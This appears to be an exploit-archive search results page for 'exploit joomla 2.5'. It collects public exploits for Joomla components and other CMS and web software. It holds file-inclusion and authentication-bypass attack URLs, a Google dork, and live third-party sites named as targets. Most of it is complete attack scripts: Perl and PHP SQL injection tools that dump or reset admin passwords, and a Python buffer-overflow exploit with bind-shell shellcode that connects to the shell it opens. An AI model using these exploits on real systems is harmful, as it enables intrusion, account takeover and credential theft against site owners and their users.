exploit joomla 2.5
Search result for 'exploit joomla 2.5'
wishnusakti/Joomla Agora 2.5.x Pantheon Local File Inclusion
================================================================================================
Title : Joomla Component Agora (com_agora) LFI Vulnerability
Vendor : http://jvital.com
Download : http://jvitals.com/downloads/file/101-agora-pantheon
Version : 2.5.x Pantheon
Date : Sunday, July 4 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te
Contact : wishnusakti[at]gmail.com
================================================================================================
[+] Vulnerable
$task = trim( JRequest::getVar('task', "") );
$task = str_replace( '../', '', $task );
if ($task)
{
require (AGORA_ROOT . "$task.php");
}
else
{
require ($agora_path . "/index.php");
}
[+] Exploit
http://[site]/[path]/index.php?option=com_agora&task=[LFI]
[+] PoC
http://localhost/index.php?option=com_agora&task=....//....//....//....//....//....//....//....//..../etc/passwd%0000
================================================================================================
Very Special thanks :
The priv8 Server residents
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, s4va, cheche angela zhang, madonk, & Bot² Scan :D)
and the whole Indonesian hacking community
Peace Yo :)
to all my friends :
cakill, aurell, hafiz, xco, xshadow,
gblack, krembis, biakkobar, hendri_note
================================================================================================
# ./wishnusakti + inc0mp13te
The Joomla Agora component version 2.5.x Pantheon suffers from a local file inclusion vulnerability.
Jakub Galczyk/Joomla 2.5.3 Information Disclosure
[ TITLE ....... ] Joomla 2.5.3 information disclosure (tested for admin)
[ DATE ........ ] 01.04.2012
[ AUTHOR ...... ] http://hauntit.blogspot.com
[ SOFT LINK ... ] http://joomla.org
[ VERSION ..... ] 2.5.3
[ TESTED ON ... ] LAMP
-----------------------------------------------------------------------
1. What is this?
2. What is the type of vulnerability?
3. Where is bug :)
4. More...
--------------------------------------------
1. What is this?
This is a very nice CMS, you should try it! ;)
--------------------------------------------
2. What is the type of vulnerability?
This is an information disclosure bug for a logged-in admin.
--------------------------------------------
3. Where is bug :)
http://your.joomla/administrator/index.php?option=com_modules&view=positions&layout=modal&tmpl=component&function=jSelectPosition_jform_position&client_id=8%27];][][]%3E???%3E./8
Vulnerable parameter is client_id, but the "output" with information (disclosure bug) is available only in the HTML source (so right-click, view source and search for the 'invalid' string to get information on where Joomla is installed on the remote server).
By the way: you can set this parameter to a non-existent ID (for example 11111111111). You should get the same response (in the source, search for 'invalid').
--------------------------------------------
4. More...
- http://hauntit.blogspot.com
- http://www.joomla.org
- http://www.google.com
- http://portswigger.net
--------------------------------------------
All questions about new projects @ mail now :)
Best regards
Joomla version 2.5.3 suffers from an information disclosure vulnerability.
Tri Huynh/openjournal2.5.txt
Open Journal Blog Authentication Bypassing Vulnerability
=================================================
PROGRAM: Open Journal
HOMEPAGE: http://www.grohol.com/downloads/oj/
VULNERABLE VERSIONS: 2.5 and below
DESCRIPTION
=================================================
OpenJournal is a completely Web-based interface (say bye-bye to FTP, manual archiving, etc.). Features include: automated file creation; automated index updating; editing of all files through a Web-based interface; entries with or without titles and time posted; automated archiving based on a weekly or monthly format. All done through ordinary text files, and no additional perl modules are needed to run it.
DETAILS
=================================================
By feeding specially crafted data into the uid parameter of the URL, an attacker can bypass the authentication process and access the software's control panel directly. The example below will let the hacker add a new user to the software account database.
http://www.test.com/cgi-bin/oj.cgi?db=default&uid=%00&userid=hacker&auth=adduser
WORKAROUND
=================================================
Open Journal's author (Dr John Grohol) has been contacted. A patched version (2.6) is ready for downloading on the website.
CREDITS
=================================================
Discovered by Tri Huynh from SentryUnion
DISCLAIMER
=================================================
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
FEEDBACK
=================================================
Please send suggestions, updates, and comments to: trihuynh@zeeup.com
Open Journal Blog versions 2.5 and below lack proper user authentication prior to attempting to add a new user to the system.
firewall1954/Bcwb2.5.txt
####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall
# Application Affect:
Bcwb 2.5
# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download
# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');
# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]
# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.
####################### Firewall #########################
Bcwb 2.5 suffers from multiple remote file inclusion vulnerabilities.
Crim3R/Joomla 1.7 / 2.5 Civicrm Arbitrary File Upload
# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload Vulnerability
# Google Dork: inurl:/components/com_civicrm/
# Date: 08/22/2012
# Author: Crim3R
# download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/
# Tested on: all
==================================
D3m0:
http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html
http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html
http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
Joomla versions 1.7 and 2.5 suffers from an arbitrary file upload vulnerability in the Civicrm component.
Ctacok/ONECMS 2.5 SQL Injection
# Exploit Title: ONECMS v2.5 SQL INJECTION
# Date: 05.03.2010
# Author: Ctacok and .:[melkiy]:.
# Software Link: http://sourceforge.net/projects/onecms/
# Version: 2.5
# Tested on: Ubuntu 9.10 Apache2+PHP5
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# ONECMS v2.5 SQL INJECTION #\n";
print "# Bug founded by: .:[melkiy]:. #\n";
print "# Exploit coded by: Ctacok #\n";
print "# Special for Antichat (forum.antichat.ru) #\n";
print "# Require : Magic_quotes = Off #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2]; # PREFIX TABLES, Default: onecms
$vuln = "-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+".$prefix."_users";
$doc = get($host.$path."index.php?load=elite&user=".$vuln."+--+");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin email: $2";
print "\n[+] Admin password: $3";
}
ONECMS version 2.5 remote SQL injection exploit.
YEnH4ckEr/Bigace CMS 2.5 SQL Injection
#!/usr/bin/perl
#-----------------------------------------------------------------------------
# User options changer (SQLi) EXPLOIT --Bigace CMS -stable release- 2.5-->
#-----------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.bigace.de/
#-->DOWNLOAD: http://downloads.sourceforge.net/bigace/
#-->DEMO: http://www.bigace.de/demo.html
#-->CATEGORY: CMS / Blogging
#-->DESCRIPTION: BIGACE is an easy-to-use multisite, multilanguage and multiuser
# Web CMS, written for PHP/MySQL.Uses FCKeditor for HTML editing...
#-->RELEASED: 2009-04-27
#
#CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3
#-->DORK: "Powered by BIGACE 2.5"
#-->CATEGORY: USER OPTIONS CHANGER/ SQL INJECTION/ PERL EXPLOIT
#-->AFFECT VERSION: LAST = 2.5 (Maybe <= ?)
#-->Discovered Bug date: 2009-04-27
#-->Reported Bug date: 2009-04-27
#-->Fixed bug date: 2009-05-04
#-->Info patch (2.6): http://www.bigace.de/BIGACE-2.6.html
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
#-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)
#
#
#------------
#CONDITIONS:
#------------
#
#**gpc_magic_quotes=off
#
#-----------------
#PRE-REQUIREMENTS
#-----------------
#
#Package --> allow.self.registration --> True (Default value)
#
#-------
#NEED:
#-------
#
#**valid username
#
#**real captcha code/img
#
#**maybe PHPSESSID (with securimage captcha plugin)
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#Register module (username option) is vuln to sql injection.
#
#Username --> Proof of concept','password','thisisthelanguage')%23
#
#Other parameters --> something
#
#
#---------------------------------------
#EXPLOIT (SQL INJECTION):
#---------------------------------------
#
#If you find a valid username, it can use --> "ON DUPLICATE KEY UPDATE column=value",
#
#this clause updates the previous row if a unique index is affected (username) and
#
#doesn't insert a new row. So (username=admin --> valid user):
#
#Username --> admin','any','any') ON DUPLICATE KEY UPDATE password=MD5(12345)%23
#
#Other parameters --> something
#
#If username=admin exists then, his password is changed to 12345!
#
#---------------------------------------
#INSTRUCTIONS:
#---------------------------------------
#
#Go to vuln web --> user register
#
#Copy the captcha image name/sid:
#
#For example --> b2evo_captcha_e24cf14f6a03283413dfb7133624a39e --> Use the b2evo captcha!
#
#For example --> ead9c0aa4822c265b346c67390b7235d --> Use the securimage captcha!
#
#Copy the captcha text. For example --> WEGKA
#
#Search a valid user. For example --> admin
#
#Choose a column. Possibilities: id,cid,email,username,password,language or active.
#
#Introduce a value for this column.
#
#If captcha uses securimage also you need PHPSESSID to exploit.
#
#Launch the exploit!
#
#Note: If username isn't valid, ie, he doesn't exist then, a new invalid user is inserted.
#
#
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
#
use LWP::UserAgent;
use HTTP::Request;
use Digest::MD5 qw(md5_hex);
#Subroutines
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title BIGACE CMS 2.5 (User Options changer) Exploit");
system ("color 02");
}
}
sub request {
my $userag = LWP::UserAgent->new;
$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
my $request = HTTP::Request -> new(POST => $_[0]);
if($_[2] == 1){
#Securimage needs PHPSESSID
$request->header(cookie => "PHPSESSID=".$_[3]);
}
#I need referer for captcha
$request->referer($_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t--->Maybe:\n\n";
print "\t\t1.-Patched or magic_quotes_gpc=ON.\n";
print "\t\t2.-User doesn't exist.\n";
print "\t\t3.-Error in captcha code or image.\n";
print "\t\t4.-Column doesn't exist.\n";
print "\t\t5.-Bad path or host.\n";
print "\t\t6.-Repeat captcha with option 1 (securimage).\n\n";
print "\t\tEXPLOIT FAILED!\n";
print "\t------------------------------------------------------------\n";
}
sub helper {
print "\n\t[!!!] BIGACE-CMS--stable-release-2.5-->(User Options) Exploit\n";
print "\t[!!!] USAGE MODE: [!!!]\n";
print "\t[!!!] perl $0 [HOST] [PATH] [Type Captcha] [Captcha/ssid img] [Captcha code] [Column] [Value] [User]\n";
print "\t[!!!] [HOST]: Web.\n";
print "\t[!!!] [PATH]: Home Path.\n";
print "\t[!!!] [Type Captcha]: B2Evo --> 0. Securimage --> 1. Default: 0\n";
print "\t[!!!] [Captcha/ssid img]: Img captcha name (0) or Img ssid name (1).\n";
print "\t[!!!] [Captcha code]: Captcha text.\n";
print "\t[!!!] [Column]: email,active(0/1),username,password,id,cid or language\n";
print "\t[!!!] [Value]: Set changed value\n";
print "\t[!!!] [User]: Username to change\n";
print "\t[!!!] [PHPSESSID]: Securimage needs PHPSESSID.\n";
print "\t[!!!] Example-1: perl $0 'www.example.es' 'bigace' '0' 'b2evo_captcha_ed5c10cb69be1ee9340b3743c8718fe2'\n";
print "\t[!!!] 'EWZ3L' 'password' '12345' 'admin'\n";
print "\t[!!!] Example-2: perl $0 'www.example.es' 'bigace' '1' '6f15b93e170f5f5e50922361b06d228d'\n";
print "\t[!!!] 'EWZ3' 'password' '12345' 'admin' 'u3h7on9taiihpbm51roeqqq2q2'\n";
print "\t[!!!] Note: If option 0 is available you can use this captcha code to change more options!\n\n";
}
#Main
&lw;
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
print "\t## BIGACE CMS 2.5 - (User Options changer) Exploit ##\n\n";
print "\t## ++Conditions: magic_quotes=off ##\n\n";
print "\t## ++Needed: Username to change ##\n\n";
print "\t## ++Needed: Valid captcha img/code ##\n\n";
print "\t## Author: Y3nh4ck3r ##\n\n";
print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n";
print "\t## Proud to be Spanish! ##\n\n";
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];
my $img=$ARGV[3];
my $code=$ARGV[4];
my $columns=$ARGV[5];
my $values=$ARGV[6];
my $username=$ARGV[7];
if(($ARGV[2]==0) || ($ARGV[2]==1)){
$option=$ARGV[2];
$numArgs = $#ARGV + 1;
if($numArgs<=7)
{
&helper;
exit(1);
}
}else{
$option=0;
$numArgs = $#ARGV + 1;
if($numArgs<=6)
{
&helper;
exit(1);
}
}
if($columns eq "password"){
$values=md5_hex($values); #pass in md5
}
#Build the uri
my $finalhost="http://".$host."/".$path."/index.php?cmd=application&id=-1_tauth_kregister_len";
#Check all variables needed
#sql injection
$injection=$username."','any','any') ON DUPLICATE KEY UPDATE ".$columns."='".$values."'%23";
#build posts with injection
if($option==0){
$post="register=do&validate=http://".$host."/".$path."/addon/b2evo/b2evo_captcha_tmp/".$img.".jpg&username=";
$PHPSESSID="nothing";
}else{
$post="register=do&validate=http://".$host."/".$path."/addon/securimage/show_captcha.php?sid=".$img."&username=";
$PHPSESSID=$ARGV[8];
}
$post.=$injection."&language=en&email=y3nh4ck3r@gmail.com&password=xxxxxxxxxxx&pwdrecheck=xxxxxxxxxxx&captcha=".$code."&sumbit=Create";
$output=&request($finalhost, $post, $option, $PHPSESSID);
#processed
if($output!~(/Title: 404 Not Found/))
{
if ($output!~(/\<div align=\"center\" id=\"registerError\"\>/))
{
print "\n\t---------------------------------------------------------------\n";
print "\t-- EXPLOIT EXECUTED (BIGACE CMS 2.5 User Options changer) --\n";
print "\t---------------------------------------------------------------\n\n";
print "\t\tUser option changed!\n\n";
print "\t\tOption changed: ".$columns."\n";
print "\t\tNew value: ".$values."\n\n";
print "\t\tIf username isn't real, you add a new inconsistent active user!\n\n";
print "\t\tNote: If option 0 is available you can use this captcha code\n";
print "\t\tto change more options!\n\n";
print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n";
print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n";
print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n";
}else{
&error;
}
}else{
&error;
}
exit(1);
#Ok...all job done
Bigace CMS version 2.5 user options changing SQL injection exploit.
Juan Sacco/EChat Server 2.5 Buffer Overflow
Information
--------------------
Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>
Description
------------------
EChat Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successfully exploiting this issue will allow an attacker to execute
arbitrary code within the context of the affected application. Failed
exploit attempts will result in a denial-of-service condition.
Exploit example as follow
-----------------------------
#!/usr/bin/python
# Easy Chat Server Server <= v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: jsacco@insecurityresearch.com
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3
import string, sys
import socket, httplib
import telnetlib
def howtousage():
    print "Sorry, required arguments: Host Port"
    sys.exit(-1)
def run():
    try:
        # Basic structure: JUNK + NSEH + SEH + SHELLCODE
        Junk = '\x41' * 216 # 216 bytes of A
        nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
        SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret
        # ShellCode Bind TCP PORT 444 Length 751 Encode : Alpha Upper
        ShellCode = (
"\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"
"\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"
"\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"
"\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
"\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
"\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"
"\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"
"\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"
"\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"
"\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"
"\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
"\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"
"\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
"\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"
"\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"
"\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"
"\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"
"\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"
"\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"
"\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"
"\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"
"\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"
"\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"
"\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"
"\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"
"\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"
"\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"
"\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"
"\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"
"\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"
"\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"
"\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"
"\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"
"\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"
"\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"
"\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"
"\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"
"\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"
"\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")
        ShellCodePort = 4444
        CraftedBuffer = Junk + nSEH + SEH + ShellCode
        vulnerableURL = ('/chat.ghp?username=' + CraftedBuffer +
                         '&password=null&room=1&null=2')
        Connection = httplib.HTTPConnection(Host, Port)
        Connection.request('GET', vulnerableURL)
        Connection.close()
        print "Connecting to " + Host
        TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
        TelnetConnection.interact()
    except:
        print "Exploit connection closed"
if __name__ == '__main__':
    print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
    print "Author: Juan Sacco (Runlvl)"
    try:
        Host = sys.argv[1]
        Port = sys.argv[2]
    except IndexError:
        howtousage()
    run()
Author
-------------------
Juan Sacco (Runlvl) - http://www.insecurityresearch.com
--
_________________________________________________
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned
EChat Server versions 2.5 and below remote buffer overflow exploit.
Qabandi/Allomani Mobile 2.5 SQL Injection
<?php
ini_set("max_execution_time",0);
print_r('
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
[q] Allomani Mobile v2.5 __/QQQ/````````````````\QQQ\___
Blind SQL inj. exploit _/QQQQQ/ \QQQQQQ\
[q] _GET <3 /QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
[q] http://allomani.com |QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
[/] -[hai]- \QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
______________________________________________________________________________
/ \
| I%00Dont%00Care... |
\______________________________________________________________________________/
\ No More Private /
`````````````````
');
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' VICTIM DIR
example: php '.$argv[0].' EXAMPLE /demo/
or if in root dir:
example: php '.$argv[0].' EXAMPLE //
-----------------------------------------------------------------------------
');
die;
}
function QABANDI($victim,$vic_dir,$inj){
$host = $victim;
$p = "http://".$host.$vic_dir;
$inj = urlencode($inj);
$packet ="GET ".$p."/login.php?action=login&username=".$inj."&password=ass HTTP/1.1\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Host: ".$victim."\r\n";
$packet.="Connection: Close\r\n\r\n";
//echo $packet;
$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}
return $data;
}
function QAB_GET($from){
$content = $from;
preg_match_all("/<center>([^<]+)<\/center>/",
$content,
$out, PREG_PATTERN_ORDER);
return base64_encode($out[1][0]);
}
$host1 = $argv[1];
$userdir1=$argv[2];
$truths = QAB_GET(QABANDI($host1,$userdir1,"' or 1='1"));
$falses = QAB_GET(QABANDI($host1,$userdir1,"' or 1='2"));
if($truths == $falses){
echo "Magic Quotes is on, exploit failed\n";
die;
}
echo "\n[q]Getting Admin User and Pass";
echo "\n username: ";
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),1,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),2,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),3,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),4,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),5,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),6,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),7,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),8,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
echo "\n password: ";
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),1,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),2,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),3,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),4,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),5,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),6,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),7,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),8,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),9,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),10,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),11,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
